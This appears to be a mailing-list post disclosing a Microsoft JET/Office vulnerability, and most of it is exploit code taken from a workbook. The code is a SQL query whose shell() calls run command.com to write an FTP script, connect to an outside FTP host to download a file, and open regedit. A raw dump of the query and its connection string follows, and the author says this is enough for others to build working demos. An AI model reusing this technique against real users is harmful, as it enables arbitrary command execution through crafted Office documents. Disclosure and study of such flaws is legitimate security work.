Microsoft JET/Office Vulnerability Exploit

[ollie () DELPHISPLC COM (Ollie Whitehouse)]

All,

Russ Cooper:
> Well, with the module password protected it seems clear you're not out
> to get that critique very quickly. Maybe if you'd let someone know the
> details we'd be able to answer you. As it is, we're simply left with
> what appears to be the same exploit.

Below is the code from the workbook:

[Code]
SELECT shell('command.com /C echo user anonymous
yeah () right com'+chr$(10)+'get .welcome c:\ftptest.txt'+chr$(10)+'quit  >
c:\jexploit.log'), shell('command.com /C ftp -s:C:\jexploit.log -n
ftp.aol.c..D.A..om',1), shell('command.com /C regedit',1)..FROM config.sys

[RAW Dump from the workbook from the SF web site]
SELECT shell('command.com /C echo user anonymous
yeah () right com'+chr$(10)+'get .welcome c:\ftptest.txt'+chr$(10)+'quit  >
c:\jexploit.log'), shell('command.com /C ftp -s:C:\jexploit.log -n
ftp.aol.c..D.A..om',1), shell('command.com /C regedit',1)..FROM config.sys
config.......DBQ=C:\;DefaultDir=C:\;Driver={Microsoft Text Driver (*.txt;
*.csv)};DriverId=27;Extensions=asc,csv,ini,tab,txt;FIL=text;Implic..}.z..itC
ommitSync=Yes;MaxBufferSize=512;MaxScanRows=25;PageTimeout=5;SafeTransaction
s=0;Threads=3;UID=admin;UserCommitSync=Yes

That will be enough information for people who want to create their own
working demo.

Ollie
<%
Ollie Whitehouse
I.T Co-Ordinator - Delphis Consulting
VOX: +44 (0)207 916 0200 (Switchboard)
FAX: +44 (0)207 916 1620 (Main)
FAX: +44 (0)870 0881837 (FAX - E-Mail)
PGP: http://www.ombs.demon.co.uk/pgp.txt
Tag: Who needs Windows2000 when you have OS/2?
%>